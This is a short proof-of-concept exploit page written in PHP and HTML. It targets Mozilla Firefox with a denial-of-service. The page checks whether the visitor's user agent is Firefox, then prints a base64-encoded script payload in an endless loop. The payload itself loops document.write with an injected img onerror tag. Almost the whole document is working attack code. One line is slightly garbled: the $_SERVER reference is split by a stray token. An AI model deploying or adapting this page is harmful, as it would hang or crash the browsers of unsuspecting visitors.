|
<!DOCTYPE html>
<html>
<body>
<?php
/* Mozilla Firefox HTML/JS DOS Vulnerability - POC by Sergio Yoshikata - @sergioyoshiman
Base64 encoded exploit "/><script>while(true){document.write ('"><img src=x onerror=alert(2)>/foobar');}</script>*/
$exploit= 'Ii8+PHNjcmlwdD53aGlsZSh0cnVlKXtkb2N1bWVudC53cml0ZSAoJyI+PGltZyBzcmM9eCBvbmVycm9yPWFsZXJ0KDIpPi9mb29iYXInKTt9PC9zY3JpcHQ+';
//check if victim is Using Mozilla Firefox
$firefox = strpos(___FCKpd___0
SERVER["HTTP_USER_AGENT"], 'Firefox') ? true : false;
if ($firefox)
{
//loop forever
while(1) {
//print exploit code infinite times.
print(base64_decode($exploit));
}
}
?>
</body>
</html>
|